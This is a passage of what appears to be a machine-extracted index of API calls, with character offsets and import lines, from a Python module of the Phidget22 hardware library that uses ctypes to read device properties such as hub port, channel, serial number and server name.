'ctypes.c_uint32', (['HubPortSpeed'], {}), '(HubPortSpeed)\n', (13006, 13020), False, 'import ctypes\n'), ((13267, 13284), 'ctypes.c_uint32', 'ctypes.c_uint32', ([], {}), '()\n', (13282, 13284), False, 'import ctypes\n'), ((13599, 13613), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (13611, 13613), False, 'import 
ctypes\n'), ((13924, 13938), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (13936, 13938), False, 'import ctypes\n'), ((14219, 14233), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (14231, 14233), False, 'import ctypes\n'), ((14549, 14578), 'ctypes.c_int', 'ctypes.c_int', (['IsHubPortDevice'], {}), '(IsHubPortDevice)\n', (14561, 14578), False, 'import ctypes\n'), ((14815, 14829), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (14827, 14829), False, 'import ctypes\n'), ((15097, 15118), 'ctypes.c_int', 'ctypes.c_int', (['IsLocal'], {}), '(IsLocal)\n', (15109, 15118), False, 'import ctypes\n'), ((15341, 15355), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (15353, 15355), False, 'import ctypes\n'), ((15629, 15651), 'ctypes.c_int', 'ctypes.c_int', (['IsRemote'], {}), '(IsRemote)\n', (15641, 15651), False, 'import ctypes\n'), ((16078, 16102), 'ctypes.c_uint32', 'ctypes.c_uint32', (['timeout'], {}), '(timeout)\n', (16093, 16102), False, 'import ctypes\n'), ((16332, 16349), 'ctypes.c_void_p', 'ctypes.c_void_p', ([], {}), '()\n', (16347, 16349), False, 'import ctypes\n'), ((16665, 16682), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (16680, 16682), False, 'import ctypes\n'), ((16984, 17001), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (16999, 17001), False, 'import ctypes\n'), ((17613, 17630), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (17628, 17630), False, 'import ctypes\n'), ((17944, 17961), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (17959, 17961), False, 'import ctypes\n'), ((18285, 18302), 'ctypes.c_uint32', 'ctypes.c_uint32', ([], {}), '()\n', (18300, 18302), False, 'import ctypes\n'), ((18632, 18646), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (18644, 18646), False, 'import ctypes\n'), ((531, 589), 'ctypes.WINFUNCTYPE', 'ctypes.WINFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p)\n', (549, 589), False, 'import ctypes\n'), ((623, 679), 'ctypes.CFUNCTYPE', 'ctypes.CFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p)\n', (639, 679), False, 'import ctypes\n'), ((782, 840), 'ctypes.WINFUNCTYPE', 'ctypes.WINFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p)\n', (800, 840), False, 'import ctypes\n'), ((874, 930), 'ctypes.CFUNCTYPE', 'ctypes.CFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p)\n', (890, 930), False, 'import ctypes\n'), ((1032, 1125), 'ctypes.WINFUNCTYPE', 'ctypes.WINFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p', 'ctypes.c_int', 'ctypes.c_char_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int,\n ctypes.c_char_p)\n', (1050, 1125), False, 'import ctypes\n'), ((1154, 1245), 'ctypes.CFUNCTYPE', 'ctypes.CFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p', 'ctypes.c_int', 'ctypes.c_char_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int,\n ctypes.c_char_p)\n', (1170, 1245), False, 'import ctypes\n'), ((1350, 1425), 'ctypes.WINFUNCTYPE', 'ctypes.WINFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p', 'ctypes.c_char_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_char_p)\n', (1368, 1425), False, 'import ctypes\n'), ((1467, 1540), 'ctypes.CFUNCTYPE', 'ctypes.CFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p', 'ctypes.c_char_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_char_p)\n', (1483, 1540), False, 'import 
ctypes\n'), ((2012, 2032), 'ctypes.byref', 'ctypes.byref', (['_value'], {}), '(_value)\n', (2024, 2032), False, 'import ctypes\n'), ((2116, 2139), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (2137, 2139), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((2204, 2229), 'ctypes.byref', 'ctypes.byref', (['self.handle'], {}), '(self.handle)\n', (2216, 2229), False, 'import ctypes\n'), ((2275, 2296), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['res'], {}), '(res)\n', (2291, 2296), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((4806, 4829), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (4827, 4829), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((4934, 4958), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (4950, 4958), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((5052, 5075), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (5073, 5075), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((5154, 5183), 'ctypes.byref', 'ctypes.byref', (['_LibraryVersion'], {}), '(_LibraryVersion)\n', (5166, 5183), False, 'import ctypes\n'), ((5212, 5236), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (5228, 5236), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((5389, 5412), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (5410, 5412), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((5497, 5532), 'ctypes.byref', 'ctypes.byref', (['_LibraryVersionNumber'], {}), '(_LibraryVersionNumber)\n', (5509, 5532), False, 'import ctypes\n'), ((5561, 5585), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (5577, 5585), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((5688, 5711), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (5709, 5711), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((5814, 5838), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (5830, 5838), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((5906, 5929), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (5927, 5929), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((6015, 6038), 'ctypes.byref', 'ctypes.byref', (['_Attached'], {}), '(_Attached)\n', (6027, 6038), False, 'import ctypes\n'), ((6067, 6091), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (6083, 6091), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((6182, 6205), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (6203, 6205), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((6290, 6312), 'ctypes.byref', 'ctypes.byref', (['_Channel'], {}), '(_Channel)\n', (6302, 6312), False, 'import ctypes\n'), ((6341, 6365), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (6357, 6365), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((6471, 6494), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 
'PhidgetSupport.getDll', ([], {}), '()\n', (6492, 6494), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((6616, 6640), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (6632, 6640), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((6716, 6739), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (6737, 6739), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((6829, 6856), 'ctypes.byref', 'ctypes.byref', (['_ChannelClass'], {}), '(_ChannelClass)\n', (6841, 6856), False, 'import ctypes\n'), ((6885, 6909), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (6901, 6909), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((7025, 7048), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (7046, 7048), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((7142, 7173), 'ctypes.byref', 'ctypes.byref', (['_ChannelClassName'], {}), '(_ChannelClassName)\n', (7154, 7173), False, 'import ctypes\n'), ((7202, 7226), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (7218, 7226), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((7352, 7375), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (7373, 7375), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((7464, 7490), 'ctypes.byref', 'ctypes.byref', (['_ChannelName'], {}), '(_ChannelName)\n', (7476, 7490), False, 'import ctypes\n'), ((7519, 7543), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (7535, 7543), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((7669, 7692), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (7690, 7692), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((7785, 7815), 'ctypes.byref', 'ctypes.byref', (['_ChannelSubclass'], {}), '(_ChannelSubclass)\n', (7797, 7815), False, 'import ctypes\n'), ((7844, 7868), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (7860, 7868), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((7932, 7955), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (7953, 7955), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((8062, 8086), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (8078, 8086), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((8196, 8219), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (8217, 8219), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((8321, 8341), 'ctypes.byref', 'ctypes.byref', (['_count'], {}), '(_count)\n', (8333, 8341), False, 'import ctypes\n'), ((8370, 8394), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (8386, 8394), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((8490, 8513), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (8511, 8513), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((8602, 8628), 'ctypes.byref', 'ctypes.byref', (['_DeviceClass'], {}), 
'(_DeviceClass)\n', (8614, 8628), False, 'import ctypes\n'), ((8657, 8681), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (8673, 8681), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((8794, 8817), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (8815, 8817), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((8910, 8940), 'ctypes.byref', 'ctypes.byref', (['_DeviceClassName'], {}), '(_DeviceClassName)\n', (8922, 8940), False, 'import ctypes\n'), ((8969, 8993), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (8985, 8993), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((9109, 9132), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (9130, 9132), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((9218, 9241), 'ctypes.byref', 'ctypes.byref', (['_DeviceID'], {}), '(_DeviceID)\n', (9230, 9241), False, 'import ctypes\n'), ((9270, 9294), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (9286, 9294), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((9396, 9419), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (9417, 9419), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((9508, 9534), 'ctypes.byref', 'ctypes.byref', (['_DeviceLabel'], {}), '(_DeviceLabel)\n', (9520, 9534), False, 'import ctypes\n'), ((9563, 9587), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (9579, 9587), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((9760, 9783), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (9781, 9783), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((9872, 9898), 'ctypes.byref', 'ctypes.byref', (['_DeviceLabel'], {}), '(_DeviceLabel)\n', (9884, 9898), False, 'import ctypes\n'), ((9927, 9951), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (9943, 9951), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((10026, 10049), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (10047, 10049), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((10137, 10162), 'ctypes.byref', 'ctypes.byref', (['_DeviceName'], {}), '(_DeviceName)\n', (10149, 10162), False, 'import ctypes\n'), ((10191, 10215), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (10207, 10215), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((10348, 10371), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (10369, 10371), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((10467, 10500), 'ctypes.byref', 'ctypes.byref', (['_DeviceSerialNumber'], {}), '(_DeviceSerialNumber)\n', (10479, 10500), False, 'import ctypes\n'), ((10529, 10553), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (10545, 10553), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((10716, 10739), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (10737, 10739), False, 'from 
Phidget22.PhidgetSupport import PhidgetSupport\n'), ((10883, 10907), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (10899, 10907), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((10980, 11003), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (11001, 11003), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((11090, 11114), 'ctypes.byref', 'ctypes.byref', (['_DeviceSKU'], {}), '(_DeviceSKU)\n', (11102, 11114), False, 'import ctypes\n'), ((11143, 11167), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (11159, 11167), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((11287, 11310), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (11308, 11310), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((11401, 11429), 'ctypes.byref', 'ctypes.byref', (['_DeviceVersion'], {}), '(_DeviceVersion)\n', (11413, 11429), False, 'import ctypes\n'), ((11458, 11482), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (11474, 11482), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((11573, 11596), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (11594, 11596), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((11677, 11695), 'ctypes.byref', 'ctypes.byref', (['_Hub'], {}), '(_Hub)\n', (11689, 11695), False, 'import ctypes\n'), ((11724, 11748), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (11740, 11748), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((11871, 11894), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (11892, 11894), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((11979, 12001), 'ctypes.byref', 'ctypes.byref', (['_HubPort'], {}), '(_HubPort)\n', (11991, 12001), False, 'import ctypes\n'), ((12030, 12054), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (12046, 12054), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((12160, 12183), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (12181, 12183), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((12305, 12329), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (12321, 12329), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((12405, 12428), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (12426, 12428), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((12518, 12545), 'ctypes.byref', 'ctypes.byref', (['_HubPortCount'], {}), '(_HubPortCount)\n', (12530, 12545), False, 'import ctypes\n'), ((12574, 12598), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (12590, 12598), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((12706, 12729), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (12727, 12729), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((12819, 12846), 'ctypes.byref', 'ctypes.byref', (['_HubPortSpeed'], {}), '(_HubPortSpeed)\n', 
(12831, 12846), False, 'import ctypes\n'), ((12875, 12899), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (12891, 12899), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((13033, 13056), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (13054, 13056), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((13188, 13212), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (13204, 13212), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((13297, 13320), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (13318, 13320), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((13413, 13443), 'ctypes.byref', 'ctypes.byref', (['_MaxHubPortSpeed'], {}), '(_MaxHubPortSpeed)\n', (13425, 13443), False, 'import ctypes\n'), ((13472, 13496), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (13488, 13496), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((13626, 13649), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (13647, 13649), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((13750, 13788), 'ctypes.byref', 'ctypes.byref', (['_HubPortSupportsSetSpeed'], {}), '(_HubPortSupportsSetSpeed)\n', (13762, 13788), False, 'import ctypes\n'), ((13817, 13841), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (13833, 13841), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((13951, 13974), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (13972, 13974), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((14061, 14085), 'ctypes.byref', 'ctypes.byref', (['_IsChannel'], {}), '(_IsChannel)\n', (14073, 14085), False, 'import ctypes\n'), ((14114, 14138), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (14130, 14138), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((14246, 14269), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (14267, 14269), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((14362, 14392), 'ctypes.byref', 'ctypes.byref', (['_IsHubPortDevice'], {}), '(_IsHubPortDevice)\n', (14374, 14392), False, 'import ctypes\n'), ((14421, 14445), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (14437, 14445), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((14591, 14614), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (14612, 14614), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((14752, 14776), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (14768, 14776), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((14842, 14865), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (14863, 14865), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((14950, 14972), 'ctypes.byref', 'ctypes.byref', (['_IsLocal'], {}), '(_IsLocal)\n', (14962, 14972), False, 'import ctypes\n'), ((15001, 15025), 
'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (15017, 15025), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((15131, 15154), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (15152, 15154), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((15276, 15300), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (15292, 15300), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((15368, 15391), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (15389, 15391), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((15477, 15500), 'ctypes.byref', 'ctypes.byref', (['_IsRemote'], {}), '(_IsRemote)\n', (15489, 15500), False, 'import ctypes\n'), ((15529, 15553), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (15545, 15553), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((15664, 15687), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (15685, 15687), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((15811, 15835), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (15827, 15835), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((15866, 15889), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (15887, 15889), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((15995, 16019), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (16011, 16019), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((16115, 16138), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (16136, 16138), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((16271, 16295), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (16287, 16295), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((16362, 16385), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (16383, 16385), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((16469, 16490), 'ctypes.byref', 'ctypes.byref', (['_Parent'], {}), '(_Parent)\n', (16481, 16490), False, 'import ctypes\n'), ((16519, 16543), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (16535, 16543), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((16695, 16718), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (16716, 16718), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((16810, 16839), 'ctypes.byref', 'ctypes.byref', (['_ServerHostname'], {}), '(_ServerHostname)\n', (16822, 16839), False, 'import ctypes\n'), ((16868, 16892), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (16884, 16892), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((17014, 17037), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (17035, 17037), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((17125, 17150), 'ctypes.byref', 
'ctypes.byref', (['_ServerName'], {}), '(_ServerName)\n', (17137, 17150), False, 'import ctypes\n'), ((17179, 17203), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (17195, 17203), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((17371, 17394), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (17392, 17394), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((17482, 17507), 'ctypes.byref', 'ctypes.byref', (['_ServerName'], {}), '(_ServerName)\n', (17494, 17507), False, 'import ctypes\n'), ((17536, 17560), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (17552, 17560), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((17643, 17666), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (17664, 17666), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((17758, 17787), 'ctypes.byref', 'ctypes.byref', (['_ServerPeerName'], {}), '(_ServerPeerName)\n', (17770, 17787), False, 'import ctypes\n'), ((17816, 17840), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (17832, 17840), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((17974, 17997), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (17995, 17997), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((18091, 18122), 'ctypes.byref', 'ctypes.byref', (['_ServerUniqueName'], {}), '(_ServerUniqueName)\n', (18103, 18122), False, 'import ctypes\n'), ((18151, 18175), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (18167, 18175), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((18315, 18338), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (18336, 18338), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((18434, 18467), 'ctypes.byref', 'ctypes.byref', (['_MaxVINTDeviceSpeed'], {}), '(_MaxVINTDeviceSpeed)\n', (18446, 18467), False, 'import ctypes\n'), ((18496, 18520), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (18512, 18520), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((18659, 18682), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (18680, 18682), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((18786, 18827), 'ctypes.byref', 'ctypes.byref', (['_VINTDeviceSupportsSetSpeed'], {}), '(_VINTDeviceSupportsSetSpeed)\n', (18798, 18827), False, 'import ctypes\n'), ((18856, 18880), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (18872, 18880), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((19054, 19077), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 